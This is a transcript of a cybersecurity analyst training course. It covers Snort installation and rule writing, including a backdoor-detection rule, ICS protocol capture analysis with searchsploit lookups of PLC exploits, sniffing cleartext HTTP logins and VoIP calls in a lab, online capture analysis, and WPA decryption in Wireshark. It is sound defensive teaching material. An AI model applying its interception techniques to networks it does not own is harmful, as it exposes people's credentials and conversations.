But before I can do that, I need to take the Amazon Web Services private key, which is part of the key pair we
mentioned.
[Video description begins] He clicks a button called "Copy to Clipboard" adjacent to an option called "IPv4
Public IP 54.88.124.128". [Video description ends]
And I need to convert it to a format that's consumable by the free PuTTY tool. Which I'll use to make an SSH
connection to Kali Linux, in Amazon Web Services.
[Video description begins] A dialog box called "PuTTY Key Generator" opens. [Video description ends]
So in the PuTTY key generator then, I need to Load an existing private key file, that's the AWS one. And just
save it back so that it's in a format used by PuTTY. So I've already done this.
[Video description begins] A dialog box called "PuTTY Configuration" opens. [Video description ends]
So here in the PuTTY tool itself on the left if I go under Connection, SSH, Auth I've already specified the
converted private key file for AWS.
[Video description begins] A command window called "54.88.124.128 - PuTTY" opens. The following prompt
is displayed: login as:. [Video description ends]
It doesn't want a password but it wants the password I assigned when I converted the private key on my local
machine. So I'm going to go ahead and enter that.
[Video description begins] The following prompt is displayed: ec2-user@kali:~$. [Video description ends]
And at this point, we are now in Kali Linux is running in the public cloud environment.
[Video description begins] He executes the following command: clear. The screen gets cleared and the prompt
does not change. [Video description ends]
During this video, you will learn how to install and configure the Snort IDS tool, as well as how to sinkhole
and use antivirus heuristics.
Objectives
install and configure the Snort IDS tool (mention sinkhole, antivirus heuristics)
[Video description begins] Topic title: Snort Installation. The presenter is Dan Lachance. [Video description
ends]
Well, we can see that the creators of Snort have a sense of humor and have chosen a fun logo.
[Video description begins] A web site called snort.org" opens. It is divided into two parts. The first part is a
menu bar. It includes options called "Documents", "Download", "Products", "Community", "Tools",
"Resources", and "Contact". The second part is a content pane. [Video description ends]
Snort is an Intrusion Detection System or IDS. It uses rules that you can customize to look for certain types of
behavior on the network or on a host, and then take specific types of actions. So it's a lot more than just packet
capturing on the network, and then writing to a log. You can get a little more in-depth with Snort. The Snort
runs on multiple platforms, so we can think about downloading the actual engine itself, but also the latest rules.
There are always some community rules that are available, and of course, you can tweak them.
[Video description begins] The sections called "Binaries", "Source", "MD5s", and "Documentation" is
displayed in the content pane. [Video description ends]
So if I go to the Downloads link here for snort.org, here we can see we've got the Binaries and also the Source
code, if you actually wanted to compile it yourself. Which usually results in having better performance
optimizations on a Linux Kernel than if you hadn't built it from Source and compiled it on that specific station.
Now, notice we've got various formats for Linux, so Red Hat Package Manager or RPMs, but also, we have an
Installer.exe for Windows.
[Video description begins] He clicks a link called "Snort_2_9_15_1_Installer.exe" under the Binaries
section. [Video description ends]
So I'm going to go ahead and download that one for the Windows platform.
[Video description begins] A dialog box called "User Account Control" opens. He clicks a button called "Yes"
and the dialog box closes. A installation wizard window called "Snort 2.9.15.1 Setup" opens. A page called
"License Agreement" is open. [Video description ends]
It's pretty small, so once it's downloaded, I'm going to go ahead and click on that to begin the installer.
[Video description begins] He clicks a button called "I Agree" and a page called "Choose Components"
opens. [Video description ends]
So I'm going to choose I Agree to the License Agreement, which of course, I've read.
[Video description begins] He clicks a button called "Next" and a page called "Choose Install Location"
opens. [Video description ends]
And I'm going to accept pretty much most of the defaults other than I'm going to install this on drive D, in the
folder called Snort, as opposed to drive C.
[Video description begins] He enter the text D:\Snort in a text box called "Destination Folder". He clicks a
button called "Next" and installation begins. [Video description ends]
And then I'll click Close and it says, Snort has successfully been installed.
[Video description begins] A message box called "Snort 2.9.15.1 Setup" opens. [Video description ends]
It also needs the WinPcap component, which I already have installed because I'm running Wireshark on this
same machine.
[Video description begins] He clicks a button called "OK" and the message box and the installation wizard
window closes. A command window called "Administrator: Command Prompt" opens. The following prompt is
displayed: D: \>. [Video description ends]
So in that same host, I'll go to drive D, I'll change directory to my installation directory Snort.
[Video description begins] He executes the following command: cd snort. No output is displayed and the
prompt changes to D:\Snort>. [Video description ends]
I do dir, we can see some structure here.
[Video description begins] He executes the following command: dir. The output displays list of directories.
The prompt does not change. [Video description ends]
I'm going to go into the bin or binary directory, and I'm going to clear the screen, type dir.
[Video description begins] He executes the following command: cd bin. No output is displayed and the prompt
changes to D:\Snort\bin>. He executes the following command: cls. The screen gets cleared and the prompt
does not change. [Video description ends]
[Video description begins] He executes the following command: dir. The output displays list of directories.
The prompt does not change. [Video description ends]
It's there, so snort --version, and here, we can see it's installed.
[Video description begins] He clears the screen and the prompt does not change. [Video description ends]
So at this point, we've got a basic core installation of Snort on the Windows platform.
[Video description begins] He executes the following command: snort --version. The output displays details of
the snort version. The prompt does not change. [Video description ends]
In a Linux environment, and of course depending on the distribution of Linux, you're running will determine
exactly what you do to install it.
[Video description begins] He opens a command window called: "dlachance@kali:~”. The following prompt
is displayed: root@kali : /#. [Video description ends]
For example, here on Kali Linux, it's already installed but I'll just step through the motions anyways if I were
to run apt-get.
[Video description begins] He executes the following command: apt-get update. The update runs and the
prompt does not change. [Video description ends]
Normally, you'd run update to make sure everything is up to date in terms of the repositories.
[Video description begins] He executes the following command: clear. The screen gets cleared and the prompt
does not change. [Video description ends]
And then the next thing you would do is simply run apt-get install and tell it that you want to install Snort.
[Video description begins] He executes the following command: apt-get install snort. The output displays
details of snort. The prompt does not change. [Video description ends]
So I'm going to go ahead and try that, so apt-get install space snort, and it says, it's already the newest version,
you're already good to go.
[Video description begins] He highlights the following text in the output: snort is already the newest version
(2.9.7.0-5). He clears the screen and the prompt does not change. [Video description ends]
Okay, so just like on the Windows platform, then, I can run snort --version to ensure that it's recognized, and it
is.
[Video description begins] He executes the following command: snort --version. The output displays details of
the snort version. The prompt does not change. [Video description ends]
During this video, you will learn how to create a Snort IDS rule.
Objectives
[Video description begins] Topic title: Snort Rules. The presenter is Dan Lachance. [Video description ends]
[Video description begins] The snort.org web site opens. [Video description ends]
And an IDS needs rules to determine what it should be looking for that is considered anomalous in this specific
environment, and then what to do about it, such as to send some kind of an alert. So here on the snort.org page,
I can not only download the Snort engine itself, but also download a common rule set, which I'm going to do
by clicking on Rules. In this case, I'm going to choose Snort v2.9 community rules.
[Video description begins] He clicks a button called "Rules". A page called "Rules" opens. It includes sections
called "Community", "Registered", and "Subscription". [Video description ends]
[Video description begins] He clicks a link called “community-rules for tar.gz” under an option called “Snort
v2.9” in the Community section. He opens the File Explorer window. He right-clicks a file called "community-
rules for tar.gz" and selects an option called "7 zip". [Video description ends]
On my computer, I've got 7-Zip installed. This is a tool that allows me to extract compressed archives. So what
I'm going to do is choose Extract Here. And we can see it results in a .tar file, a tape archive file, so I'm going
to right-click on it, choose 7-Zip and also choose to extract it here. Finally, we now see a community-rules
folder, where I can see we have a number of files, now the largest file here is called community.rules. I'm
going to go ahead and open up that text file.
[Video description begins] A wordPad file called "community.rules" opens. [Video description ends]
And so in this community rules file, we can scroll down and start to read the details, the actual syntax. Now
bear in mind anything that's got a pound symbol or a # in front of it is a comment.
[Video description begins] He points the following text: # alert tcp $HOME_NET 2589 -> $EXTERNAL_NET
any (msg:"MALWARE-BACKDOOR - Dagger_1.4.0"; flow: to_client, established; content:"2|00 00 00 06 00
00 00|Drives|24 00|"; depth:16; metadata: ruleset community; classtype:misc-activity; sid:105;
rev:14;). [Video description ends]
So the first keyword we see here is to generate an alert, such as if you're running Snort and you want an alert
written to the console, then the protocol. Then we can see the source location. The $HOME_NET is a variable
that exists inside of the Snort config file. Let's take a look at that for one sec.
[Video description begins] The dlachance@kali: ~ command prompt window opens. The following prompt is
displayed: root@kali:~#. [Video description ends]
So here what I want to do in my Linux box where I'm going to run Snort is simply run the nano command, we
want to take a look at our Snort config. So that's going to be in /etc directory under snort and the file is called
snort.conf.
[Video description begins] He executes the following command: nano /etc/snort/snort.conf. The contents of the
file are displayed in GNU nano 4.8. [Video description ends]
So let's just kind of scroll down here just a little bit to see what's up. So here we can see, we've got a variable,
it's called HOME_NET, and it's set to any. But we could put in a specific IP network range if we wanted to. So
these can be referred to within rules is the point. So let's just press Ctrl+X to get out of there. Back in our rule,
we can see a port number.
[Video description begins] He switches back to the community.rules wordPad file. [Video description ends]
Now this is from, because notice the direction here of the arrow is from and to, so traffic going to the external
network on any port number. We are generating a msg, so we decide what this is, this says MALWARE-
BACKDOOR, and so on. And the whole thing is within double quotation marks, then a semicolon.
And then we're checking to make sure that we have an established connection. And then we're taking a look in
the content of the transmission.
[Video description begins] He highlights the following text: flow: to_client, established. [Video description
ends]
Now depending on what kind of traffic you're looking at, such as if it's IPsec encrypted with ESP, your Snort
rules won't be able to see that detailed content.
[Video description begins] He highlights the following text: content:"2|00 00 00 06 00 00 00|Drives|24
00|". [Video description ends]
But this is what's in the payload of the transmission, it could be a text string, in this case, we've got other
values.
[Video description begins] He highlights the following text: classtype:misc-activity.[Video description ends]
And essentially the next thing we're doing is as an option, setting a classtype, we're setting the Snort ID, and
we're setting a revision number.
[Video description begins] He highlights the following text: sid:105. [Video description ends]
[Video description begins] He highlights the following text: rev:14. [Video description ends]
So you're going to see a lot of rules in here that you can use if you really want to, but we can also build our
own rules.
[Video description begins] The dlachance@kali: ~ command prompt window opens. The following prompt is
displayed: root@kali:~#. [Video description ends]
So back here in Linux, in addition to using the rules that we can download and keep updating, we can also
build our own custom rules and that really is the power. You can tweak existing rules or create your own to
really configure how you want chosen detection to behave in your environment. So I'm going to go ahead and
open up /etc using the nano editor, /snort/rules. And I'm going to open up a file called local.rules where I've
already added three custom rules. These three custom rules are shown here on separate lines.
[Video description begins] He executes the following command: nano /etc/snort/rules/local.rules. The contents
of the file are displayed in GNU nano 4.8. [Video description ends]
The first rule here is running alert, and I'm interested in basically generating an alert if I see icmp traffic.
[Video description begins] He points to the following text in the local.rules file: alert icmp any any ->
$HOME_NET any (msg:"ICMP test"; sid:1000001; rev:1; classtype: icmp-><: icmp-event;). [Video
description ends]
So from anywhere, any port going to the home network, that's the variable on the snort.conf file and any port
on the home network. Then the message I want to generate that will show up is "ICMP test". I can set a sid
number as long as it's over a million, which it is, 1000001. And then I'm setting rev:1; of this rule, and I can
optionally set the classtype, in this case, to icmp-event. So the class type is just a predefined Snort category
type that can help when you have a lot of rules for organizing them, especially in other visualization tools.
Okay, so we are looking for any type of ICMP traffic, from anywhere going to the home network, any host and
any port number. Although if you are pinging, for example, that doesn't really use a port number anyway, just
an ICMP type. The second rule here is using an alert looking at the tcp protocol.
[Video description begins] He points to the following text in the local.rules file: alert tcp any any ->
$HOME_NET 23 (msg:"Telnet connection attempt"; sid:1000002; rev:1;). [Video description ends]
And what we're doing is really looking for anything targeting, anything on our $HOME_NET range to port 23.
TCP port 23 is used for Telnet, we want to know if there are any Telnet connection attempts, so this is Telnet
connection attempt. That's what we've decided we want the message to be and all we're doing here is giving it
the next Snort ID number. So 1000002 to be specific and it's revision one of my custom rule. And notice this
syntax here, each of these component is separated with the ;. And the entire rule after you have defined the
direction and the source and target is enclosed within opening and closing parentheses. Finally, the last rule
here is TCP based. Really what's different here is we're looking at content.
[Video description begins] He points to the following text in the local.rules file: alert tcp any any -> any any
(msg:"Failed website login for BadStore"; content:"not found"; sid:1000003; rev:1;). [Video description ends]
Content is in the packet payload. I'm looking for the text, not found.
[Video description begins] He opens a web page called "BadStore.net - Register/Login". It is divided into two
parts. The first part is a navigation pane. The second part is a content pane. A page called "Login to Your
Account or Register for a New Account" is open in the content pane. [Video description ends]
Now on my sample vulnerable website here, BadStore.net, if I attempt to login or register, let's say put in an
email [email protected] and some kind of password. And I go to attempt to Login.
[Video description begins] A window called “*Wi-Fi” opens. It is divided into four parts. The first part is a
menu bar. The second part is a tool bar. The third part is an address bar. The fourth part is a content pane.
The content pane includes three sections. [Video description ends]
So it didn't work, UserID and Password not found! but let's take a look at our Wireshark Packet capture of that
transmission.
[Video description begins] He points to the first section. It includes a table with seven columns and several
rows. The column headers are No., Time, Source, Destination, Protocol, Length, and Info. [Video description
ends]
So here on Wireshark, I'm on packet number 1, I'm going to go to Edit, Find Packet, I want to look in the
Packet details for the text not found.
[Video description begins] He clicks a menu option called "Edit" and selects an option called "Find
Packet". [Video description ends]
And here it says, UserID and Password not found and so on.
[Video description begins] He points to the third section in the content pane. [Video description ends]
So basically when you use content with your Snort rules, you can look at any of this visible content to trigger
some kind of action, in this case, an alert. I want it to say, or I want to look for rather not found, I could get
more detailed, but that should be sufficient for this example.
[Video description begins] He switches to the dlachance@kali: ~ command prompt window. A file called
“/etc/snort/rules/local.rules” is open in GNU nano 4.8. [Video description ends]
Okay, and I want the message to say Failed website login for BadStore, excellent.
[Video description begins] He highlights the following text: Failed website login for BadStore. [Video
description ends]
So I'm going to press Ctrl+X to get out of there. Now, the next thing that we want to do is load up Snort, so we
can see messages on the console.
[Video description begins] The following prompt is displayed: root@kali:~#. [Video description ends]
So I'm going to run snort dash capital A console, the capital A means I want to run snort in alert mode, dash
lowercase q for quiet mode.
[Video description begins] He executes the following command: clear. The screen gets cleared and the prompt
does not change. [Video description ends]
I don't want to see initialization information. I'm going to specify the config file with -c. So the default is
/etc/snort, and then snort.conf, and finally -i for interface, I want Snort to listen on interface eth0 on this host.
Now what's going to happen is it's going to be in alert mode. And if there are any existing rules that would
generate alerts, we'll see those, but we want to test our three custom rules to see what we get, okay.
[Video description begins] He executes the following command: snort -A console -q -c /etc/snort/snort.conf -i
eth0. [Video description ends]
So this is good, it shouldn't return anything until it starts seeing traffic that it should be reporting on.
[Video description begins] He opens a window called "Command Prompt". The following prompt is displayed:
D:\>. It displays the following command: telnet 192.168.4.52. [Video description ends]
So here in Windows, I'm going to run Telnet against a host, and it's trying to connect to Telnet, couldn't open it
because there is not a Telnet daemon there.
[Video description begins] The output reads: Connecting To 192.168.4.52...Could not open connection to the
host, on port 23: Connect failed. The prompt does not change. [Video description ends]
Back here in Linux where Snort's running, notice, we've got Telnet connection attempts showing up. We also
have some other ones like Universal Plug and Play, UPnP scans, that's from the default rule set, I didn't create
a rule for that in our custom Snort file.
[Video description begins] He highlights the following text in the output: SCAN UPnP service attempt. [Video
description ends]
But so far, it's picking up our Telnet connection attempts. Back here in my Windows host, a different host on
the network, I'm just going to go ahead and send a ping to that host.
[Video description begins] He highlights the following text in the output: Telnet connection attempt. [Video
description ends]
Now that host is the one where we're running Snort, but it doesn't have to be, if Snort can see all the traffic. So
we're getting a reply and ping is happening.
[Video description begins] He executes the following command: ping 192.168.4.52. The output displays the
messages of the ping process. The prompt does not change. [Video description ends]
Let's go check out the Snort console.
[Video description begins] He switches to the dlachance@kali: ~ command prompt window. [Video
description ends]
All right, so we can see a lot of ICMP ping, it knows it's coming from Windows and well of course we can see
the IP addresses from and to.
[Video description begins] He highlights the following text in the output: ICMP PING Windows. [Video
description ends]
So this is the station I initiated the ping from, and it was targeted to what happens to be this host running Snort.
But remember, you don't have to create Snort rules and only watch what's happening on the Snort host. That
would be crazy and not very flexible.
[Video description begins] He highlights the following text in the output: 192.168.4.24 ->
192.168.4.52. [Video description ends]
Back here in our BadStore.net, let's try to log in with a fake account. Let's call this fake1, and I'll just put in the
password being the same thing.
[Video description begins] He switches to the BadStore.net - Register/Login web page. [Video description
ends]
And it says UserID not found, a data breach on a site might have exposed your password.
[Video description begins] A message box called "Change your password" opens. [Video description ends]
That's fine, that's the Chrome web browser telling you that, that's a good thing.
[Video description begins] He clicks a button called "OK" and the message box closes. [Video description
ends]
And back here in Linux with Snort, we've got a lot of activity. But we can see, if we go far up enough, that
we've got some failed login attempts, so failed website login for BadStore.
[Video description begins] He highlights the following text in the output: Failed website login for
BadStore. [Video description ends]
Back here in the /etc/snort/snort.conf file, I've opened up that file with the nano editor, and I've pressed Ctrl+W
to search, and I've looked for the word output. This determines the format of output files under /file/log/snort.
[Video description begins] He switches to the /etc/snort/rules/local.rules file in the GNU nano 4.8. [Video
description ends]
So we'll start with snort.log, and we can see some details related to that.
[Video description begins] He highlights the following text: output unified2. [Video description ends]
So that's where you're going to be going to look at some of the output aside from the console.
8. Video: Industrial Control System Network Traffic (it_cscysa20_16_enus_08)
During this video, you will learn how to analyze an ICS traffic capture.
Objectives
[Video description begins] Topic title: Industrial Control System Network Traffic. The presenter is Dan
Lachance. [Video description ends]
One way to analyze network traffic is to capture it using a tool such as Wireshark and then saving it as a
capture file for future analysis.
[Video description begins] A web site called “wiki.wireshark.org/SampleCaptures”. It contains tabs called
“FrontPage”, “RecentChanges”, “FindPage”, “HelpContents”, and “SampleCaptures”. The
SampleCaptures tab is selected. [Video description ends]
And there are plenty of resources out there on the Internet of packet captures that you can simply download
and open up in tools like Wireshark. To learn more about protocols or learn more about intrusion detection. As
an example here I'm at the wiki.wireshark.org site. Where there is an enormous amount of packet captures to
select from, and we can search the page.
For example, if I look for s7, then I see I've got a couple of hits here, where we can download some packet
captures related to the S7 protocol. So as I keep going through we can see many hits here. The S7, of course, is
a proprietary protocol for Siemens equipment for Programmable Logic Controllers or PLCs. Now there are
also many other, outside of Wireshark, many other valid sources of packet captures that you can download.
[Video description begins] He opens a web site called “netresec.com/?page=PcapFiles”. A page called
"Publicly available PCAP files" is open. [Video description ends]
So packet captures for Cyber Defense Exercises and Malware Traffic and so on.
So this is a very valuable source of information from the learning and testing perspective.
[Video description begins] He points to the first section. It includes a table with seven columns and several
rows. The column headers are No., Time, Source, Destination, Protocol, Length, and Info. [Video description
ends]
In this first packet capture we have the ability to look at a lot of S7 communication. We can see here there are
some protocol packets for S7COMM. We can actually filter on that. So to remove all of the noise.
[Video description begins] He enters s7comm in the address bar. The corresponding details are displayed in
the first, second, and third sections of the content pane [Video description ends]
And see really just that type of traffic. Now, this is used to talk to PLCs or Programmable Logic Controllers
using the S7 comm protocol which is proprietary to Siemens. Now if we take a look at the structure of the
packet header, let's just pick one packet here. We'll notice that we've got our standard Ethernet header. So it's
got a source and destination MAC address.
[Video description begins] He expands a section called “Ethernet II” in the second section of the content
pane. [Video description ends]
[Video description begins] He right-clicks the 00:1c:06:27:64:11 text and selects an option called "Copy". He
further selects an option called "Value". [Video description ends]
And can I can look it up in another tool to see which manufacturer it belongs to, the first three parts of the
MAC address identify the vendor. Now, here we can see, it's listed clearly, but we can also use online lookup
tools to figure this out.
[Video description begins] He opens a web site called “macvendors.com”. [Video description ends]
So on this sample site macvendors.com, I've entered in the MAC address and it tells me that it's a Siemens
Numerical Control Ltd. type of device.
[Video description begins] He pastes the value: 00:1c:06:27:64:11 in a text box called "Enter a MAC
Address". [Video description ends]
So we can figure that out quite easily when we're looking at packet captures, if it's not otherwise shown
already.
So back here in the packet capture, we can then see that the next header is going to be IPv4. And indeed we
have an Internet protocol or IPv4 header with the standard type of information.
[Video description begins] He expands a section called “Internet Protocol Version 4” in the second section of
the content pane. [Video description ends]
So we can see the Time to live or TTL value, the next protocol header which is going to be TCP at checksum,
source and destination IP addresses. So all of the stuff that we would normally expect in an IP network. Then
of course we've got OSI layer four Transmission Control Protocol or TCP header.
[Video description begins] He expands a section called “Transmission Control Protocol” in the second
section of the content pane. [Video description ends]
We can see the source and destination ports. Now notice the source port here is 102. Now Port 102 is usually
used to talk to specific types of PLCs, in this case, Siemens style or type of PLC devices. Now, as you might
imagine, Port 102 is normally blocked on most routers. In other words, it's not allowed. So therefore the traffic
is usually within a specific local area network designated for PLCs. And we can see by looking at the network
address that the source and destinations are definitely on the same subnet. Although it's hard to say technically
without seeing the subnet mask.
[Video description begins] He points to the first section in the content pane. [Video description ends]
So as we dig down through the headers, we're now in the S7 Communication header, we can start to see some
more details about what is being done.
[Video description begins] He points to a section called "S7 Communication" in the second section in the
content pane. [Video description ends]
[Video description begins] He opens the dlachance@kali: ~ command window. The following prompt is
displayed: root@kali :/#. [Video description ends]
Now here in Kali Linux, if I were to use the searchsploit command, and let's say I just searched for s7.
[Video description begins] He executes the following command: searchsploit s7. The output displays various
references for s7. The prompt does not change. [Video description ends]
Immediately I see a lot of references for exploits such as the CPU START/STOP Module. Of course in order
for this to work, the attacker would have to gain access to the network where the PLCs reside. Now often those
types of networks can be very sensitive and so they might be air gapped. But there have been known cases
where if we can trick someone into downloading a file, putting it onto a USB thumb drive, and they walk into a
facility and plug that thumb drive into a computer. On the air gapped network, there could be a problem. We
can do the same type of thing with the modbus protocol. So this is often used with Schneider Electric devices
on Industrial Control Networks or ICSs, it's a standard protocol. So let's say we were to searchsploit modbus.
[Video description begins] He executes the following command: searchsploit modbus. The output displays
various references for s7. The prompt does not change. [Video description ends]
Well, we now see we have numerous exploits even related to that built into a free standard publicly available
tool in the form of Kali Linux. So its important, then, to be able to understand how devices communicate on an
industrial control network, setting a baseline so that you can determine what is abnormal.
[Video description begins] Topic title: HTTP Authentication Traffic. The presenter is Dan Lachance. [Video
description ends]
If a malicious user can get connected to a network, then they have the potential of inserting themselves
between two communicating devices. Sort of a man-in-the-middle attack, perhaps through ARP cache
poisoning, so that they could see all network transmissions. And if some of those network transmissions aren't
encrypted, the attacker will see everything.
[Video description begins] A web page called “BeEF Authentication” opens. [Video description ends]
So in this example, I'm going to a sample web application under my control, where I can see in the address bar
there's a message that says it's Not secure.
[Video description begins] He clicks a link in address bar called "Not secure" and a message box called
“Your connection to this site is not secure” opens. [Video description ends]
So this means that I'm connected over HTTP and not HTTPS. And it says, don't enter any sensitive
information like passwords or credit cards, because it could be stolen by attackers, which is correct.
[Video description begins] He closes the message box. He opens a window called
"http_clear_authn_traffic_packet45.pcapng". It is divided into four parts. The first part is a menu bar. The
second part is a tool bar. The third part is an address bar. The fourth part is a content pane. The content pane
includes three sections. [Video description ends]
So I'm going to enter in a Username and a Password and Login to the simple web application, all the while
capturing traffic in Wireshark in the background. Here in Wireshark, I can see a lot of transmissions were
captured. So the first thing I really want to do is apply a filter here. So we're only looking at what's relevant,
let's weed out the noise. So my web application that I was interested in is at 192.168.4.24. And so I'm going to
filter it using ip.addr, IP address, equals so, two equal signs is the syntax here in Wireshark and I'll press Enter.
So now I filtered out the traffic.
[Video description begins] He enters ip.addr==192.168.4.24 in the address bar. The corresponding details
are displayed in the first, second, and third sections of the content pane. [Video description ends]
Now I could go through and take a look at the traffic, and for example, see some HTTP traffic. And I could
perhaps go to Analyze, Follow, TCP Stream.
[Video description begins] He points to the first section in the content pane. [Video description ends]
[Video description begins] He selects a menu called "Analyze" and selects a menu option called "Follow". He
further selects an option called "TCP Stream" from the flyout. The corresponding dialog box opens. [Video
description ends]
I see BEEFSESSION cookie. Which implies that authentication has already occurred. So I don't really see a
username or password at this point. So I'm probably too far down in the packet stream. So that's okay. Let's
filter this out again from what we did originally. And let's just start at the very top here of this filtered list of
traffic. I'll select the first packet. Once again, I'll go to Analyze, Follow, TCP Stream. This time, we have what
we were looking for.
[Video description begins] The corresponding dialog box opens. [Video description ends]
The username is beef, and the password is beef. This is what was sent in clear text over the network when
logging into that web app. And so instead of having to look through every individual packet that was captured,
you can start to make a connection by selecting a packet to stream. And having it put it all together so it's more
readable was done here. So the lesson is simple. Encrypt everything, whether data at rest or network
transmissions. Really, there's no reason in this day and age to have a web application that requires
authentication where that web app is not configured to use HTTPS. It needs to be using TLS.
In this video, find out how to play back a captured VoIP call.
Objectives
[Video description begins] Topic title: VoIP Traffic Analysis. The presenter is Dan Lachance. [Video
description ends]
Voice over IP or VoIP, V-O-I-P, is widely used around the globe and has been for years both at a personal
level as well as within the enterprise. Such as having VoIP phones. What this really means is we're using a
standard TCP/IP transmission network to transmit packets that contain voice information. Now, what's
important is that the performance be reasonable enough so that we can transmit this quickly enough and put it
back together. So the person on the other end can make sense out of what's being said and too much hasn't
been lost in the way of packets, during the transmission. That's where the Session Initiation Protocol or SIP
comes in, which is used to set up and maintain and then tear down sessions that involve things like voice over
IP.
[Video description begins] He opens a window called "sip-rtp-g726.pcap". It is divided into four parts. The
first part is a menu bar. The second part is a tool bar. The third part is an address bar. The fourth part is a
content pane. The content pane includes three sections. [Video description ends]
So here in Wireshark, I've got a packet capture where we can see there is a lot of SIP and RTP traffic. RTP is
also involved in transmitting, in this context, audio over an IP network.
[Video description begins] He points to the first section which includes a table with multiple rows and seven
columns in the content pane. He points to the table. [Video description ends]
Well, the thing about this is because it's often very time sensitive, you'll find that many VoIP calls over the
network are not encrypted. They can be encrypted, and of course, we can control network path routing and
have isolated networks with VoIP devices to further protect them. But if someone happens to capture
unencrypted VoIP traffic then the result can be they could actually put together the stream again, playback the
audio, as an example. In this sample packet capture, I'm going to select the first packet in the list, it's a SIP
packet. And I'm simply here in Wireshark going to go to Telephony. Then I'm going to go all the way down
and choose SIP Flows.
[Video description begins] He selects a menu called "Telephony" and selects a menu option called "SIP
Flows". The corresponding dialog box opens. It includes a table with several rows and columns. He points to
the table. [Video description ends]
Here, we can see there were some communication sessions between hosts on the network and we can see, of
course the Initial Speaker. So the IP address. Now we can also see the SIP address of the recipient, and so on.
So I'm going to go ahead and select one of these and click the Play Streams button. And sure enough, we can
see it's put together a waveform file.
[Video description begins] He selects the last row. A window called “Wireshark • RTP Player” opens. [Video
description ends]
And if I click the play button, I'll actually be able to listen back to what that part of the conversation was.
[Video description begins] He clicks a button called "Close" and the window closes. [Video description ends]
So in this manner it's always crucial to make sure that if we're going to deploy something like VoIP devices, so
Voice over IP phones on a network, that we make sure we have strict network access control policies in place
to limit access to that network.
[Video description begins] He clicks a button called "Cancel" and the dialog box closes. [Video description
ends]
And you might even consider it in some cases encrypting the traffic if it doesn't negatively affect the quality of
calls.
[Video description begins] Topic title: Online Network Traffic Analysis. The presenter is Dan
Lachance. [Video description ends]
While an important skill for cybersecurity analysts is to not only have the ability to properly capture network
traffic, but also to analyze it looking for suspicious activity or indicators of compromise. But what's equally
important is knowing of tools that can do that analysis for us, including online tools.
[Video description begins] A web site called “packettotal.com” opens. [Video description ends]
There is one of many examples in the form of packettotal.com, whose website we're looking at here. So I can
either drag packet capture files here or click to upload. So I'm going to go ahead and click to upload a simple
packet capture.
[Video description begins] A message box called "Begin PCAP Analysis" opens. [Video description ends]
Now it's not very big, it's about half a megabyte in size. So I'm going to go ahead and click on I'm not a robot,
and I'll click Analyze. And depending on the size of the packet capture will determine how long this takes.
And it'll redirect me and give me immediate response about what I should be concerned about. Now, these
links across the top will vary depending on the nature of the content of the packet capture file, so depending on
the nature of the traffic.
[Video description begins] A new page is displayed. It contains tabs called "Malicious Activity",
"Connections", "HTTP", "Transferred Files", and "Similar Packet Captures". The Malicious Activity tab is
selected. It includes a table with ten columns and two rows. The column headers include Timestamp, Alert
Description, Alert Signature, Severity, Sender IP, Sender Port, and Target IP. [Video description ends]
But immediately, we have a concern. It says, Malicious Activity, A Network Trojan was detected. And we can
even see the Alert Signatures. So something about Evil Redirector Leading to EK. So often a Network Trojan
is simply used to disguise something malicious as being benign or innocent. And then tricking someone into
clicking on something which might unleash something like ransomware. Or some other kind of malware that
would reach out to the Internet from the infected station to a command and control server, which could be this
Target IP. Let's just search up this Target IP in our favorite web browser search engine, see what we get. Well,
it doesn't take long to get a result when I search for that.
[Video description begins] He opens the Google search and enters 83.217.27.178 in a search box. [Video
description ends]
And if I click on one of the links, it looks like most users of this particular service have voted this as a
malicious site.
[Video description begins] He clicks a link called "IP > 83.217.27.178 | Threatcrowd.org Open Source
Threat". A new web site opens. [Video description ends]
There are links down below for reports. And then there are different domain names at different points in time
that had been associated with this. Well, that's interesting. Why so many different hard to read unintelligible
domain names are associated with this? That could be suspicious. Next thing I'll do is go down to another one,
the Neutrino Exploit Kit.
[Video description begins] He goes back to the Google search. He clicks a link called "Neutrino Exploit Kit
via pseudoDarkleech HOPTO.ORG gate". A new web site opens. [Video description ends]
Looks like somebody else has run into the same issue. So we're seeing references to the Neutrino Exploit Kit,
which is often simply abbreviated as EK. You'll see that a lot in this type of documentation. So, we have some
examples here, somebody else having captured the traffic. And basically isolated that, looks like there's some
kind of an infected WordPress component on a site that is downloading the payload for the malware. And we
can even take it a step further by looking to see if there are any known Common Vulnerability and Exposures
listings or CVEs related to Neutrino. So I've gone to the cve.mitre.org site. I'm going to click Search CVE List
and I'm going to search up neutrino. And immediately, we can see we have all kinds of searching. So this is
definitely a known issue.
[Video description begins] He opens the packettotal.com web site. [Video description ends]
So back here where we uploaded our packet capture, that probably resulted in a quicker analysis and
identification of a threat than we could have done manually by simply scouring through the packet capture.
In this video, find out how to enter a WPA password in WireShark to decrypt wireless traffic.
Objectives
enter a WPA password in WireShark to decrypt wireless traffic
[Video description begins] Topic title: IEEE 802.11 WPA Traffic. The presenter is Dan Lachance. [Video
description ends]
We know that one of the simplest things you can do to protect a Wi-Fi network is to enable encryption. Now
we want to stay away from known vulnerable encryption schemes for wireless networks like WEP, W-E-P, but
instead we might opt for a WPA 2 or 3. But if you capture network traffic when you're connected to a Wi-Fi
network that is encrypted, when you look at the packet capture unto itself after, you're not really going to see
very much if you're not entering in the decryption key, which would then show you all of the packet headers
and details.
[Video description begins] He opens a window called "Wi-Fi_wpa-PW_Induction.pcap". It is divided into four
parts. The first part is a menu bar. The second part is a tool bar. The third part is an address bar. The fourth
part is a content pane. The content pane includes three sections. [Video description ends]
For example, here in Wireshark I've got a packet capture, a Wi-Fi packet capture we can see the Protocol is
802.11, that's the Wi-Fi standard.
[Video description begins] He points to the first section which includes the table with several columns and
rows in the content pane. He points to the table [Video description ends]
Now as we go down through these packets and just randomly take a peek at them, we can see that in the
headers, well, I have a Radiotap Header, an 802.11 radio information header.
[Video description begins] In the second section of the content pane, he expands a section called "Radiotap
Header v0".
[Video description begins] He expands a section called "802.11 radio information". [Video description ends]
Then I've got an IEEE 802.11 Acknowledgment, but where's everything I'm used to seeing, where are the other
headers?
[Video description begins] He expands a section called "IEEE 802.11 Acknowledgement" in the second
section of the content pane. [Video description ends]
How do I know if this is an HTTP packet? Or whether it's an ARP transmission or a ping packet using ICMP?
There's no way you can know if it's encrypted. And that's why in Wireshark we have the ability to enter in the
decryption passphrase. Now we can do that if we know it, and I do know it. So I'm going to go to the Edit
menu, and I'm going to go down into Preferences here in Wireshark.
[Video description begins] A dialog box called "Wireshark • Preferences" opens. [Video description ends]
I'm going to expand Protocols, and we're looking for IEEE 802.11.
